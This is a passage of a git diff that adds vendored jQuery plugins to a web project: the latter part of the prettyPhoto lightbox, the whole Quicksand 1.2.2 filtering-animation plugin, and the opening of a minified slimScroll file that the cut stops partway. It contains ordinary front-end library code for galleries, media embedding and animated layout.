+ + // Inject the proper content + switch(_getFileType(pp_images[set_position])){ + case 'image': + imgPreloader = new Image(); + + // Preload the neighbour images + nextImage = new Image(); + if(isSet && set_position < $(pp_images).size() -1) nextImage.src = pp_images[set_position + 1]; + prevImage = new Image(); + if(isSet && pp_images[set_position - 1]) prevImage.src = pp_images[set_position - 1]; + + $pp_pic_holder.find('#pp_full_res')[0].innerHTML = settings.image_markup.replace(/{path}/g,pp_images[set_position]); + + imgPreloader.onload = function(){ + // Fit item to viewport + pp_dimensions = _fitToViewport(imgPreloader.width,imgPreloader.height); + + _showContent(); + }; + + imgPreloader.onerror = function(){ + alert('Image cannot be loaded. Make sure the path is correct and image exist.'); + $.prettyPhoto.close(); + }; + + imgPreloader.src = pp_images[set_position]; + break; + + case 'youtube': + pp_dimensions = _fitToViewport(movie_width,movie_height); // Fit item to viewport + + // Regular youtube link + movie_id = getParam('v',pp_images[set_position]); + + // youtu.be link + if(movie_id == ""){ + movie_id = pp_images[set_position].split('youtu.be/'); + movie_id = movie_id[1]; + if(movie_id.indexOf('?') > 0) + movie_id = movie_id.substr(0,movie_id.indexOf('?')); // Strip anything after the ? + + if(movie_id.indexOf('&') > 0) + movie_id = movie_id.substr(0,movie_id.indexOf('&')); // Strip anything after the & + } + + movie = 'http://www.youtube.com/embed/'+movie_id; + (getParam('rel',pp_images[set_position])) ? movie+="?rel="+getParam('rel',pp_images[set_position]) : movie+="?rel=1"; + + if(settings.autoplay) movie += "&autoplay=1"; + + toInject = settings.iframe_markup.replace(/{width}/g,pp_dimensions['width']).replace(/{height}/g,pp_dimensions['height']).replace(/{wmode}/g,settings.wmode).replace(/{path}/g,movie); + break; + + case 'vimeo': + pp_dimensions = _fitToViewport(movie_width,movie_height); // Fit item to viewport + + movie_id = pp_images[set_position]; + var regExp = /http:\/\/(www\.)?vimeo.com\/(\d+)/; + var match = movie_id.match(regExp); + + movie = 'http://player.vimeo.com/video/'+ match[2] +'?title=0&byline=0&portrait=0'; + if(settings.autoplay) movie += "&autoplay=1;"; + + vimeo_width = pp_dimensions['width'] + '/embed/?moog_width='+ pp_dimensions['width']; + + toInject = settings.iframe_markup.replace(/{width}/g,vimeo_width).replace(/{height}/g,pp_dimensions['height']).replace(/{path}/g,movie); + break; + + case 'quicktime': + pp_dimensions = _fitToViewport(movie_width,movie_height); // Fit item to viewport + pp_dimensions['height']+=15; pp_dimensions['contentHeight']+=15; pp_dimensions['containerHeight']+=15; // Add space for the control bar + + toInject = settings.quicktime_markup.replace(/{width}/g,pp_dimensions['width']).replace(/{height}/g,pp_dimensions['height']).replace(/{wmode}/g,settings.wmode).replace(/{path}/g,pp_images[set_position]).replace(/{autoplay}/g,settings.autoplay); + break; + + case 'flash': + pp_dimensions = _fitToViewport(movie_width,movie_height); // Fit item to viewport + + flash_vars = pp_images[set_position]; + flash_vars = flash_vars.substring(pp_images[set_position].indexOf('flashvars') + 10,pp_images[set_position].length); + + filename = pp_images[set_position]; + filename = filename.substring(0,filename.indexOf('?')); + + toInject = settings.flash_markup.replace(/{width}/g,pp_dimensions['width']).replace(/{height}/g,pp_dimensions['height']).replace(/{wmode}/g,settings.wmode).replace(/{path}/g,filename+'?'+flash_vars); + break; + + case 'iframe': + pp_dimensions = _fitToViewport(movie_width,movie_height); // Fit item to viewport + + frame_url = pp_images[set_position]; + frame_url = frame_url.substr(0,frame_url.indexOf('iframe')-1); + + toInject = settings.iframe_markup.replace(/{width}/g,pp_dimensions['width']).replace(/{height}/g,pp_dimensions['height']).replace(/{path}/g,frame_url); + break; + + case 'ajax': + doresize = false; // Make sure the dimensions are not resized. + pp_dimensions = _fitToViewport(movie_width,movie_height); + doresize = true; // Reset the dimensions + + skipInjection = true; + $.get(pp_images[set_position],function(responseHTML){ + toInject = settings.inline_markup.replace(/{content}/g,responseHTML); + $pp_pic_holder.find('#pp_full_res')[0].innerHTML = toInject; + _showContent(); + }); + + break; + + case 'custom': + pp_dimensions = _fitToViewport(movie_width,movie_height); // Fit item to viewport + + toInject = settings.custom_markup; + break; + + case 'inline': + // to get the item height clone it, apply default width, wrap it in the prettyPhoto containers , then delete + myClone = $(pp_images[set_position]).clone().append('
    ').css({'width':settings.default_width}).wrapInner('
    ').appendTo($('body')).show(); + doresize = false; // Make sure the dimensions are not resized. + pp_dimensions = _fitToViewport($(myClone).width(),$(myClone).height()); + doresize = true; // Reset the dimensions + $(myClone).remove(); + toInject = settings.inline_markup.replace(/{content}/g,$(pp_images[set_position]).html()); + break; + }; + + if(!imgPreloader && !skipInjection){ + $pp_pic_holder.find('#pp_full_res')[0].innerHTML = toInject; + + // Show content + _showContent(); + }; + }); + + return false; + }; + + + /** + * Change page in the prettyPhoto modal box + * @param direction {String} Direction of the paging, previous or next. + */ + $.prettyPhoto.changePage = function(direction){ + currentGalleryPage = 0; + + if(direction == 'previous') { + set_position--; + if (set_position < 0) set_position = $(pp_images).size()-1; + }else if(direction == 'next'){ + set_position++; + if(set_position > $(pp_images).size()-1) set_position = 0; + }else{ + set_position=direction; + }; + + rel_index = set_position; + + if(!doresize) doresize = true; // Allow the resizing of the images + if(settings.allow_expand) { + $('.pp_contract').removeClass('pp_contract').addClass('pp_expand'); + } + + _hideContent(function(){ $.prettyPhoto.open(); }); + }; + + + /** + * Change gallery page in the prettyPhoto modal box + * @param direction {String} Direction of the paging, previous or next. + */ + $.prettyPhoto.changeGalleryPage = function(direction){ + if(direction=='next'){ + currentGalleryPage ++; + + if(currentGalleryPage > totalPage) currentGalleryPage = 0; + }else if(direction=='previous'){ + currentGalleryPage --; + + if(currentGalleryPage < 0) currentGalleryPage = totalPage; + }else{ + currentGalleryPage = direction; + }; + + slide_speed = (direction == 'next' || direction == 'previous') ? settings.animation_speed : 0; + + slide_to = currentGalleryPage * (itemsPerPage * itemWidth); + + $pp_gallery.find('ul').animate({left:-slide_to},slide_speed); + }; + + + /** + * Start the slideshow... + */ + $.prettyPhoto.startSlideshow = function(){ + if(typeof pp_slideshow == 'undefined'){ + $pp_pic_holder.find('.pp_play').unbind('click').removeClass('pp_play').addClass('pp_pause').click(function(){ + $.prettyPhoto.stopSlideshow(); + return false; + }); + pp_slideshow = setInterval($.prettyPhoto.startSlideshow,settings.slideshow); + }else{ + $.prettyPhoto.changePage('next'); + }; + } + + + /** + * Stop the slideshow... + */ + $.prettyPhoto.stopSlideshow = function(){ + $pp_pic_holder.find('.pp_pause').unbind('click').removeClass('pp_pause').addClass('pp_play').click(function(){ + $.prettyPhoto.startSlideshow(); + return false; + }); + clearInterval(pp_slideshow); + pp_slideshow=undefined; + } + + + /** + * Closes prettyPhoto. + */ + $.prettyPhoto.close = function(){ + if($pp_overlay.is(":animated")) return; + + $.prettyPhoto.stopSlideshow(); + + $pp_pic_holder.stop().find('object,embed').css('visibility','hidden'); + + $('div.pp_pic_holder,div.ppt,.pp_fade').fadeOut(settings.animation_speed,function(){ $(this).remove(); }); + + $pp_overlay.fadeOut(settings.animation_speed, function(){ + if($.browser.msie && $.browser.version == 6) $('select').css('visibility','visible'); // To fix the bug with IE select boxes + + if(settings.hideflash) $('object,embed,iframe[src*=youtube],iframe[src*=vimeo]').css('visibility','visible'); // Show the flash + + $(this).remove(); // No more need for the prettyPhoto markup + + $(window).unbind('scroll.prettyphoto'); + + clearHashtag(); + + settings.callback(); + + doresize = true; + + pp_open = false; + + delete settings; + }); + }; + + /** + * Set the proper sizes on the containers and animate the content in. + */ + function _showContent(){ + $('.pp_loaderIcon').hide(); + + // Calculate the opened top position of the pic holder + projectedTop = scroll_pos['scrollTop'] + ((windowHeight/2) - (pp_dimensions['containerHeight']/2)); + if(projectedTop < 0) projectedTop = 0; + + $ppt.fadeTo(settings.animation_speed,1); + + // Resize the content holder + $pp_pic_holder.find('.pp_content') + .animate({ + height:pp_dimensions['contentHeight'], + width:pp_dimensions['contentWidth'] + },settings.animation_speed); + + // Resize picture the holder + $pp_pic_holder.animate({ + 'top': projectedTop, + 'left': ((windowWidth/2) - (pp_dimensions['containerWidth']/2) < 0) ? 0 : (windowWidth/2) - (pp_dimensions['containerWidth']/2), + width:pp_dimensions['containerWidth'] + },settings.animation_speed,function(){ + $pp_pic_holder.find('.pp_hoverContainer,#fullResImage').height(pp_dimensions['height']).width(pp_dimensions['width']); + + $pp_pic_holder.find('.pp_fade').fadeIn(settings.animation_speed); // Fade the new content + + // Show the nav + if(isSet && _getFileType(pp_images[set_position])=="image") { $pp_pic_holder.find('.pp_hoverContainer').show(); }else{ $pp_pic_holder.find('.pp_hoverContainer').hide(); } + + if(settings.allow_expand) { + if(pp_dimensions['resized']){ // Fade the resizing link if the image is resized + $('a.pp_expand,a.pp_contract').show(); + }else{ + $('a.pp_expand').hide(); + } + } + + if(settings.autoplay_slideshow && !pp_slideshow && !pp_open) $.prettyPhoto.startSlideshow(); + + settings.changepicturecallback(); // Callback! + + pp_open = true; + }); + + _insert_gallery(); + pp_settings.ajaxcallback(); + }; + + /** + * Hide the content...DUH! + */ + function _hideContent(callback){ + // Fade out the current picture + $pp_pic_holder.find('#pp_full_res object,#pp_full_res embed').css('visibility','hidden'); + $pp_pic_holder.find('.pp_fade').fadeOut(settings.animation_speed,function(){ + $('.pp_loaderIcon').show(); + + callback(); + }); + }; + + /** + * Check the item position in the gallery array, hide or show the navigation links + * @param setCount {integer} The total number of items in the set + */ + function _checkPosition(setCount){ + (setCount > 1) ? $('.pp_nav').show() : $('.pp_nav').hide(); // Hide the bottom nav if it's not a set. + }; + + /** + * Resize the item dimensions if it's bigger than the viewport + * @param width {integer} Width of the item to be opened + * @param height {integer} Height of the item to be opened + * @return An array containin the "fitted" dimensions + */ + function _fitToViewport(width,height){ + resized = false; + + _getDimensions(width,height); + + // Define them in case there's no resize needed + imageWidth = width, imageHeight = height; + + if( ((pp_containerWidth > windowWidth) || (pp_containerHeight > windowHeight)) && doresize && settings.allow_resize && !percentBased) { + resized = true, fitting = false; + + while (!fitting){ + if((pp_containerWidth > windowWidth)){ + imageWidth = (windowWidth - 200); + imageHeight = (height/width) * imageWidth; + }else if((pp_containerHeight > windowHeight)){ + imageHeight = (windowHeight - 200); + imageWidth = (width/height) * imageHeight; + }else{ + fitting = true; + }; + + pp_containerHeight = imageHeight, pp_containerWidth = imageWidth; + }; + + _getDimensions(imageWidth,imageHeight); + + if((pp_containerWidth > windowWidth) || (pp_containerHeight > windowHeight)){ + _fitToViewport(pp_containerWidth,pp_containerHeight) + }; + }; + + return { + width:Math.floor(imageWidth), + height:Math.floor(imageHeight), + containerHeight:Math.floor(pp_containerHeight), + containerWidth:Math.floor(pp_containerWidth) + (settings.horizontal_padding * 2), + contentHeight:Math.floor(pp_contentHeight), + contentWidth:Math.floor(pp_contentWidth), + resized:resized + }; + }; + + /** + * Get the containers dimensions according to the item size + * @param width {integer} Width of the item to be opened + * @param height {integer} Height of the item to be opened + */ + function _getDimensions(width,height){ + width = parseFloat(width); + height = parseFloat(height); + + // Get the details height, to do so, I need to clone it since it's invisible + $pp_details = $pp_pic_holder.find('.pp_details'); + $pp_details.width(width); + detailsHeight = parseFloat($pp_details.css('marginTop')) + parseFloat($pp_details.css('marginBottom')); + + $pp_details = $pp_details.clone().addClass(settings.theme).width(width).appendTo($('body')).css({ + 'position':'absolute', + 'top':-10000 + }); + detailsHeight += $pp_details.height(); + detailsHeight = (detailsHeight <= 34) ? 36 : detailsHeight; // Min-height for the details + if($.browser.msie && $.browser.version==7) detailsHeight+=8; + $pp_details.remove(); + + // Get the titles height, to do so, I need to clone it since it's invisible + $pp_title = $pp_pic_holder.find('.ppt'); + $pp_title.width(width); + titleHeight = parseFloat($pp_title.css('marginTop')) + parseFloat($pp_title.css('marginBottom')); + $pp_title = $pp_title.clone().appendTo($('body')).css({ + 'position':'absolute', + 'top':-10000 + }); + titleHeight += $pp_title.height(); + $pp_title.remove(); + + // Get the container size, to resize the holder to the right dimensions + pp_contentHeight = height + detailsHeight; + pp_contentWidth = width; + pp_containerHeight = pp_contentHeight + titleHeight + $pp_pic_holder.find('.pp_top').height() + $pp_pic_holder.find('.pp_bottom').height(); + pp_containerWidth = width; + } + + function _getFileType(itemSrc){ + if (itemSrc.match(/youtube\.com\/watch/i) || itemSrc.match(/youtu\.be/i)) { + return 'youtube'; + }else if (itemSrc.match(/vimeo\.com/i)) { + return 'vimeo'; + }else if(itemSrc.match(/\b.mov\b/i)){ + return 'quicktime'; + }else if(itemSrc.match(/\b.swf\b/i)){ + return 'flash'; + }else if(itemSrc.match(/\biframe=true\b/i)){ + return 'iframe'; + }else if(itemSrc.match(/\bajax=true\b/i)){ + return 'ajax'; + }else if(itemSrc.match(/\bcustom=true\b/i)){ + return 'custom'; + }else if(itemSrc.substr(0,1) == '#'){ + return 'inline'; + }else{ + return 'image'; + }; + }; + + function _center_overlay(){ + if(doresize && typeof $pp_pic_holder != 'undefined') { + scroll_pos = _get_scroll(); + contentHeight = $pp_pic_holder.height(), contentwidth = $pp_pic_holder.width(); + + projectedTop = (windowHeight/2) + scroll_pos['scrollTop'] - (contentHeight/2); + if(projectedTop < 0) projectedTop = 0; + + if(contentHeight > windowHeight) + return; + + $pp_pic_holder.css({ + 'top': projectedTop, + 'left': (windowWidth/2) + scroll_pos['scrollLeft'] - (contentwidth/2) + }); + }; + }; + + function _get_scroll(){ + if (self.pageYOffset) { + return {scrollTop:self.pageYOffset,scrollLeft:self.pageXOffset}; + } else if (document.documentElement && document.documentElement.scrollTop) { // Explorer 6 Strict + return {scrollTop:document.documentElement.scrollTop,scrollLeft:document.documentElement.scrollLeft}; + } else if (document.body) {// all other Explorers + return {scrollTop:document.body.scrollTop,scrollLeft:document.body.scrollLeft}; + }; + }; + + function _resize_overlay() { + windowHeight = $(window).height(), windowWidth = $(window).width(); + + if(typeof $pp_overlay != "undefined") $pp_overlay.height($(document).height()).width(windowWidth); + }; + + function _insert_gallery(){ + if(isSet && settings.overlay_gallery && _getFileType(pp_images[set_position])=="image" && (settings.ie6_fallback && !($.browser.msie && parseInt($.browser.version) == 6))) { + itemWidth = 52+5; // 52 beign the thumb width, 5 being the right margin. + navWidth = (settings.theme == "facebook" || settings.theme == "pp_default") ? 50 : 30; // Define the arrow width depending on the theme + + itemsPerPage = Math.floor((pp_dimensions['containerWidth'] - 100 - navWidth) / itemWidth); + itemsPerPage = (itemsPerPage < pp_images.length) ? itemsPerPage : pp_images.length; + totalPage = Math.ceil(pp_images.length / itemsPerPage) - 1; + + // Hide the nav in the case there's no need for links + if(totalPage == 0){ + navWidth = 0; // No nav means no width! + $pp_gallery.find('.pp_arrow_next,.pp_arrow_previous').hide(); + }else{ + $pp_gallery.find('.pp_arrow_next,.pp_arrow_previous').show(); + }; + + galleryWidth = itemsPerPage * itemWidth; + fullGalleryWidth = pp_images.length * itemWidth; + + // Set the proper width to the gallery items + $pp_gallery + .css('margin-left',-((galleryWidth/2) + (navWidth/2))) + .find('div:first').width(galleryWidth+5) + .find('ul').width(fullGalleryWidth) + .find('li.selected').removeClass('selected'); + + goToPage = (Math.floor(set_position/itemsPerPage) < totalPage) ? Math.floor(set_position/itemsPerPage) : totalPage; + + $.prettyPhoto.changeGalleryPage(goToPage); + + $pp_gallery_li.filter(':eq('+set_position+')').addClass('selected'); + }else{ + $pp_pic_holder.find('.pp_content').unbind('mouseenter mouseleave'); + // $pp_gallery.hide(); + } + } + + function _build_overlay(caller){ + // Inject Social Tool markup into General markup + if(settings.social_tools) + facebook_like_link = settings.social_tools.replace('{location_href}', encodeURIComponent(location.href)); + + settings.markup = settings.markup.replace('{pp_social}',''); + + $('body').append(settings.markup); // Inject the markup + + $pp_pic_holder = $('.pp_pic_holder') , $ppt = $('.ppt'), $pp_overlay = $('div.pp_overlay'); // Set my global selectors + + // Inject the inline gallery! + if(isSet && settings.overlay_gallery) { + currentGalleryPage = 0; + toInject = ""; + for (var i=0; i < pp_images.length; i++) { + if(!pp_images[i].match(/\b(jpg|jpeg|png|gif)\b/gi)){ + classname = 'default'; + img_src = ''; + }else{ + classname = ''; + img_src = pp_images[i]; + } + toInject += "
  • "; + }; + + toInject = settings.gallery_markup.replace(/{gallery}/g,toInject); + + $pp_pic_holder.find('#pp_full_res').after(toInject); + + $pp_gallery = $('.pp_pic_holder .pp_gallery'), $pp_gallery_li = $pp_gallery.find('li'); // Set the gallery selectors + + $pp_gallery.find('.pp_arrow_next').click(function(){ + $.prettyPhoto.changeGalleryPage('next'); + $.prettyPhoto.stopSlideshow(); + return false; + }); + + $pp_gallery.find('.pp_arrow_previous').click(function(){ + $.prettyPhoto.changeGalleryPage('previous'); + $.prettyPhoto.stopSlideshow(); + return false; + }); + + $pp_pic_holder.find('.pp_content').hover( + function(){ + $pp_pic_holder.find('.pp_gallery:not(.disabled)').fadeIn(); + }, + function(){ + $pp_pic_holder.find('.pp_gallery:not(.disabled)').fadeOut(); + }); + + itemWidth = 52+5; // 52 beign the thumb width, 5 being the right margin. + $pp_gallery_li.each(function(i){ + $(this) + .find('a') + .click(function(){ + $.prettyPhoto.changePage(i); + $.prettyPhoto.stopSlideshow(); + return false; + }); + }); + }; + + + // Inject the play/pause if it's a slideshow + if(settings.slideshow){ + $pp_pic_holder.find('.pp_nav').prepend('Play') + $pp_pic_holder.find('.pp_nav .pp_play').click(function(){ + $.prettyPhoto.startSlideshow(); + return false; + }); + } + + $pp_pic_holder.attr('class','pp_pic_holder ' + settings.theme); // Set the proper theme + + $pp_overlay + .css({ + 'opacity':0, + 'height':$(document).height(), + 'width':$(window).width() + }) + .bind('click',function(){ + if(!settings.modal) $.prettyPhoto.close(); + }); + + $('a.pp_close').bind('click',function(){ $.prettyPhoto.close(); return false; }); + + + if(settings.allow_expand) { + $('a.pp_expand').bind('click',function(e){ + // Expand the image + if($(this).hasClass('pp_expand')){ + $(this).removeClass('pp_expand').addClass('pp_contract'); + doresize = false; + }else{ + $(this).removeClass('pp_contract').addClass('pp_expand'); + doresize = true; + }; + + _hideContent(function(){ $.prettyPhoto.open(); }); + + return false; + }); + } + + $pp_pic_holder.find('.pp_previous, .pp_nav .pp_arrow_previous').bind('click',function(){ + $.prettyPhoto.changePage('previous'); + $.prettyPhoto.stopSlideshow(); + return false; + }); + + $pp_pic_holder.find('.pp_next, .pp_nav .pp_arrow_next').bind('click',function(){ + $.prettyPhoto.changePage('next'); + $.prettyPhoto.stopSlideshow(); + return false; + }); + + _center_overlay(); // Center it + }; + + if(!pp_alreadyInitialized && getHashtag()){ + pp_alreadyInitialized = true; + + // Grab the rel index to trigger the click on the correct element + hashIndex = getHashtag(); + hashRel = hashIndex; + hashIndex = hashIndex.substring(hashIndex.indexOf('/')+1,hashIndex.length-1); + hashRel = hashRel.substring(0,hashRel.indexOf('/')); + + // Little timeout to make sure all the prettyPhoto initialize scripts has been run. + // Useful in the event the page contain several init scripts. + setTimeout(function(){ $("a["+pp_settings.hook+"^='"+hashRel+"']:eq("+hashIndex+")").trigger('click'); },50); + } + + return this.unbind('click.prettyphoto').bind('click.prettyphoto',$.prettyPhoto.initialize); // Return the jQuery object for chaining. The unbind method is used to avoid click conflict when the plugin is called more than once + }; + + function getHashtag(){ + url = location.href; + hashtag = (url.indexOf('#prettyPhoto') !== -1) ? decodeURI(url.substring(url.indexOf('#prettyPhoto')+1,url.length)) : false; + + return hashtag; + }; + + function setHashtag(){ + if(typeof theRel == 'undefined') return; // theRel is set on normal calls, it's impossible to deeplink using the API + location.hash = theRel + '/'+rel_index+'/'; + }; + + function clearHashtag(){ + if ( location.href.indexOf('#prettyPhoto') !== -1 ) location.hash = "prettyPhoto"; + } + + function getParam(name,url){ + name = name.replace(/[\[]/,"\\\[").replace(/[\]]/,"\\\]"); + var regexS = "[\\?&]"+name+"=([^&#]*)"; + var regex = new RegExp( regexS ); + var results = regex.exec( url ); + return ( results == null ) ? "" : results[1]; + } + +})(jQuery); + +var pp_alreadyInitialized = false; // Used for the deep linking to make sure not to call the same function several times. diff --git a/master/static/js/jquery.quicksand.js b/master/static/js/jquery.quicksand.js new file mode 100644 index 0000000..626f490 --- /dev/null +++ b/master/static/js/jquery.quicksand.js @@ -0,0 +1,307 @@ +/* + +Quicksand 1.2.2 + +Reorder and filter items with a nice shuffling animation. + +Copyright (c) 2010 Jacek Galanciak (razorjack.net) and agilope.com +Big thanks for Piotr Petrus (riddle.pl) for deep code review and wonderful docs & demos. + +Dual licensed under the MIT and GPL version 2 licenses. +http://github.com/jquery/jquery/blob/master/MIT-LICENSE.txt +http://github.com/jquery/jquery/blob/master/GPL-LICENSE.txt + +Project site: http://razorjack.net/quicksand +Github site: http://github.com/razorjack/quicksand + +*/ + +(function ($) { + $.fn.quicksand = function (collection, customOptions) { + var options = { + duration: 750, + easing: 'swing', + attribute: 'data-id', // attribute to recognize same items within source and dest + adjustHeight: 'auto', // 'dynamic' animates height during shuffling (slow), 'auto' adjusts it before or after the animation, false leaves height constant + useScaling: true, // disable it if you're not using scaling effect or want to improve performance + enhancement: function(c) {}, // Visual enhacement (eg. font replacement) function for cloned elements + selector: '> *', + dx: 0, + dy: 0 + }; + $.extend(options, customOptions); + + if ($.browser.msie || (typeof($.fn.scale) == 'undefined')) { + // Got IE and want scaling effect? Kiss my ass. + options.useScaling = false; + } + + var callbackFunction; + if (typeof(arguments[1]) == 'function') { + var callbackFunction = arguments[1]; + } else if (typeof(arguments[2] == 'function')) { + var callbackFunction = arguments[2]; + } + + + return this.each(function (i) { + var val; + var animationQueue = []; // used to store all the animation params before starting the animation; solves initial animation slowdowns + var $collection = $(collection).clone(); // destination (target) collection + var $sourceParent = $(this); // source, the visible container of source collection + var sourceHeight = $(this).css('height'); // used to keep height and document flow during the animation + + var destHeight; + var adjustHeightOnCallback = false; + + var offset = $($sourceParent).offset(); // offset of visible container, used in animation calculations + var offsets = []; // coordinates of every source collection item + + var $source = $(this).find(options.selector); // source collection items + + // Replace the collection and quit if IE6 + if ($.browser.msie && $.browser.version.substr(0,1)<7) { + $sourceParent.html('').append($collection); + return; + } + + // Gets called when any animation is finished + var postCallbackPerformed = 0; // prevents the function from being called more than one time + var postCallback = function () { + + if (!postCallbackPerformed) { + postCallbackPerformed = 1; + + // hack: + // used to be: $sourceParent.html($dest.html()); // put target HTML into visible source container + // but new webkit builds cause flickering when replacing the collections + $toDelete = $sourceParent.find('> *'); + $sourceParent.prepend($dest.find('> *')); + $toDelete.remove(); + + if (adjustHeightOnCallback) { + $sourceParent.css('height', destHeight); + } + options.enhancement($sourceParent); // Perform custom visual enhancements on a newly replaced collection + if (typeof callbackFunction == 'function') { + callbackFunction.call(this); + } + } + }; + + // Position: relative situations + var $correctionParent = $sourceParent.offsetParent(); + var correctionOffset = $correctionParent.offset(); + if ($correctionParent.css('position') == 'relative') { + if ($correctionParent.get(0).nodeName.toLowerCase() == 'body') { + + } else { + correctionOffset.top += (parseFloat($correctionParent.css('border-top-width')) || 0); + correctionOffset.left +=( parseFloat($correctionParent.css('border-left-width')) || 0); + } + } else { + correctionOffset.top -= (parseFloat($correctionParent.css('border-top-width')) || 0); + correctionOffset.left -= (parseFloat($correctionParent.css('border-left-width')) || 0); + correctionOffset.top -= (parseFloat($correctionParent.css('margin-top')) || 0); + correctionOffset.left -= (parseFloat($correctionParent.css('margin-left')) || 0); + } + + // perform custom corrections from options (use when Quicksand fails to detect proper correction) + if (isNaN(correctionOffset.left)) { + correctionOffset.left = 0; + } + if (isNaN(correctionOffset.top)) { + correctionOffset.top = 0; + } + + correctionOffset.left -= options.dx; + correctionOffset.top -= options.dy; + + // keeps nodes after source container, holding their position + $sourceParent.css('height', $(this).height()); + + // get positions of source collections + $source.each(function (i) { + offsets[i] = $(this).offset(); + }); + + // stops previous animations on source container + $(this).stop(); + var dx = 0; var dy = 0; + $source.each(function (i) { + $(this).stop(); // stop animation of collection items + var rawObj = $(this).get(0); + if (rawObj.style.position == 'absolute') { + dx = -options.dx; + dy = -options.dy; + } else { + dx = options.dx; + dy = options.dy; + } + + rawObj.style.position = 'absolute'; + rawObj.style.margin = '0'; + + rawObj.style.top = (offsets[i].top - parseFloat(rawObj.style.marginTop) - correctionOffset.top + dy) + 'px'; + rawObj.style.left = (offsets[i].left - parseFloat(rawObj.style.marginLeft) - correctionOffset.left + dx) + 'px'; + }); + + // create temporary container with destination collection + var $dest = $($sourceParent).clone(); + var rawDest = $dest.get(0); + rawDest.innerHTML = ''; + rawDest.setAttribute('id', ''); + rawDest.style.height = 'auto'; + rawDest.style.width = $sourceParent.width() + 'px'; + $dest.append($collection); + // insert node into HTML + // Note that the node is under visible source container in the exactly same position + // The browser render all the items without showing them (opacity: 0.0) + // No offset calculations are needed, the browser just extracts position from underlayered destination items + // and sets animation to destination positions. + $dest.insertBefore($sourceParent); + $dest.css('opacity', 0.0); + rawDest.style.zIndex = -1; + + rawDest.style.margin = '0'; + rawDest.style.position = 'absolute'; + rawDest.style.top = offset.top - correctionOffset.top + 'px'; + rawDest.style.left = offset.left - correctionOffset.left + 'px'; + + + + + + if (options.adjustHeight === 'dynamic') { + // If destination container has different height than source container + // the height can be animated, adjusting it to destination height + $sourceParent.animate({height: $dest.height()}, options.duration, options.easing); + } else if (options.adjustHeight === 'auto') { + destHeight = $dest.height(); + if (parseFloat(sourceHeight) < parseFloat(destHeight)) { + // Adjust the height now so that the items don't move out of the container + $sourceParent.css('height', destHeight); + } else { + // Adjust later, on callback + adjustHeightOnCallback = true; + } + } + + // Now it's time to do shuffling animation + // First of all, we need to identify same elements within source and destination collections + $source.each(function (i) { + var destElement = []; + if (typeof(options.attribute) == 'function') { + + val = options.attribute($(this)); + $collection.each(function() { + if (options.attribute(this) == val) { + destElement = $(this); + return false; + } + }); + } else { + destElement = $collection.filter('[' + options.attribute + '=' + $(this).attr(options.attribute) + ']'); + } + if (destElement.length) { + // The item is both in source and destination collections + // It it's under different position, let's move it + if (!options.useScaling) { + animationQueue.push( + { + element: $(this), + animation: + {top: destElement.offset().top - correctionOffset.top, + left: destElement.offset().left - correctionOffset.left, + opacity: 1.0 + } + }); + + } else { + animationQueue.push({ + element: $(this), + animation: {top: destElement.offset().top - correctionOffset.top, + left: destElement.offset().left - correctionOffset.left, + opacity: 1.0, + scale: '1.0' + } + }); + + } + } else { + // The item from source collection is not present in destination collections + // Let's remove it + if (!options.useScaling) { + animationQueue.push({element: $(this), + animation: {opacity: '0.0'}}); + } else { + animationQueue.push({element: $(this), animation: {opacity: '0.0', + scale: '0.0'}}); + } + } + }); + + $collection.each(function (i) { + // Grab all items from target collection not present in visible source collection + + var sourceElement = []; + var destElement = []; + if (typeof(options.attribute) == 'function') { + val = options.attribute($(this)); + $source.each(function() { + if (options.attribute(this) == val) { + sourceElement = $(this); + return false; + } + }); + + $collection.each(function() { + if (options.attribute(this) == val) { + destElement = $(this); + return false; + } + }); + } else { + sourceElement = $source.filter('[' + options.attribute + '=' + $(this).attr(options.attribute) + ']'); + destElement = $collection.filter('[' + options.attribute + '=' + $(this).attr(options.attribute) + ']'); + } + + var animationOptions; + if (sourceElement.length === 0) { + // No such element in source collection... + if (!options.useScaling) { + animationOptions = { + opacity: '1.0' + }; + } else { + animationOptions = { + opacity: '1.0', + scale: '1.0' + }; + } + // Let's create it + d = destElement.clone(); + var rawDestElement = d.get(0); + rawDestElement.style.position = 'absolute'; + rawDestElement.style.margin = '0'; + rawDestElement.style.top = destElement.offset().top - correctionOffset.top + 'px'; + rawDestElement.style.left = destElement.offset().left - correctionOffset.left + 'px'; + d.css('opacity', 0.0); // IE + if (options.useScaling) { + d.css('transform', 'scale(0.0)'); + } + d.appendTo($sourceParent); + + animationQueue.push({element: $(d), + animation: animationOptions}); + } + }); + + $dest.remove(); + options.enhancement($sourceParent); // Perform custom visual enhancements during the animation + for (i = 0; i < animationQueue.length; i++) { + animationQueue[i].element.animate(animationQueue[i].animation, options.duration, options.easing, postCallback); + } + }); + }; +})(jQuery); \ No newline at end of file diff --git a/master/static/js/jquery.slimscroll.js b/master/static/js/jquery.slimscroll.js new file mode 100644 index 0000000..92d31d2 --- /dev/null +++ b/master/static/js/jquery.slimscroll.js @@ -0,0 +1 @@ +!function(e){e.fn.extend({slimScroll:function(i){var o={width:"auto",height:"250px",size:"7px",color:"#000",position:"right",distance:"1px",start:"top",opacity:.4,alwaysVisible:!1,disableFadeOut:!1,railVisible:!1,railColor:"#333",railOpacity:.2,railDraggable:!0,railClass:"slimScrollRail",barClass:"slimScrollBar",wrapperClass:"slimScrollDiv",allowPageScroll:!1,wheelStep:20,touchScrollStep:200,borderRadius:"7px",railBorderRadius:"7px"},s=e.extend(o,i);return this.each(function(){function o(t){if(h){var t=t||window.event,i=0;t.wheelDelta&&(i=-t.wheelDelta/120),t.detail&&(i=t.detail/3);var o=t.target||t.srcTarget||t.srcElement;e(o).closest("."+s.wrapperClass).is(x.parent())&&r(i,!0),t.preventDefault&&!y&&t.preventDefault(),y||(t.returnValue=!1)}}function r(e,t,i){y=!1;var o=e,r=x.outerHeight()-R.outerHeight();if(t&&(o=parseInt(R.css("top"))+e*parseInt(s.wheelStep)/100*R.outerHeight(),o=Math.min(Math.max(o,0),r),o=e>0?Math.ceil(o):Math.floor(o),R.css({top:o+"px"})),v=parseInt(R.css("top"))/(x.outerHeight()-R.outerHeight()),o=v*(x[0].scrollHeight-x.outerHeight()),i){o=e;var a=o/x[0].scrollHeight*x.outerHeight();a=Math.min(Math.max(a,0),r),R.css({top:a+"px"})}x.scrollTop(o),x.trigger("slimscrolling",~~o),n(),c()}function a(e){window.addEventListener?(e.addEventListener("DOMMouseScroll",o,!1),e.addEventListener("mousewheel",o,!1)):document.attachEvent("onmousewheel",o)}function l(){f=Math.max(x.outerHeight()/x[0].scrollHeight*x.outerHeight(),m),R.css({height:f+"px"});var 